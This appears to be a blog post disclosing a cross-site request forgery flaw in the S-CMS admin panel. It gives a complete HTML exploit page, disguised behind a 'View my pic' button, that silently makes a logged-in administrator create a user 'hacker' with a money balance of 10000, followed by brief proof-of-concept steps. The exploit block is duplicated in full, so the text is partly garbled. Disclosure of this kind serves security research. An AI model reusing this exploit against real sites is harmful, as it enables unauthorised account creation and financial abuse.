Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip
CSRF Exp:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
</head>
<body>
<center><h1>fake request</center>
<div>
<form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">
<input type="hidden" name="M_login" value="hacker">
<input type="hidden" name="M_pwd" value="hacker">
<input type="hidden" name="M_money" value="10000">
<input type="hidden" name="M_fen" value="0">
<input type="hidden" name="M_name" value="1">
<input type="hidden" name="M_email" value="g@gmail.com">
<input type="hidden" name="M_qq" value="132">
<input type="hidden" name="M_add" value="x">
<input type="hidden" name="M_mobile" value="11111111111">
<input type="hidden" name="M_code" value="xxxx">
<input type="submit" value="View my pic">
</form>
</body>
</html>
poc:
There are four users before administrator clicked the link
When administrator logged in and access the fake page then click the button,a request was sent.
A new user was created after the request.
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip
CSRF Exp:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
</head>
<body>
<center><h1>fake request</center>
<div>
<form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">
<input type="hidden" name="M_login" value="hacker">
<input type="hidden" name="M_pwd" value="hacker">
<input type="hidden" name="M_money" value="10000">
<input type="hidden" name="M_fen" value="0">
<input type="hidden" name="M_name" value="1">
<input type="hidden" name="M_email" value="g@gmail.com">
<input type="hidden" name="M_qq" value="132">
<input type="hidden" name="M_add" value="x">
<input type="hidden" name="M_mobile" value="11111111111">
<input type="hidden" name="M_code" value="xxxx">
<input type="submit" value="View my pic">
</form>
</body>
</html>
poc:
There are four users before administrator clicked the link
four users(before) |
The fake page |
When administrator logged in and access the fake page then click the button,a request was sent.
the adding user request |
A new user was created after the request.
five users exist(after) |
Comments
Post a Comment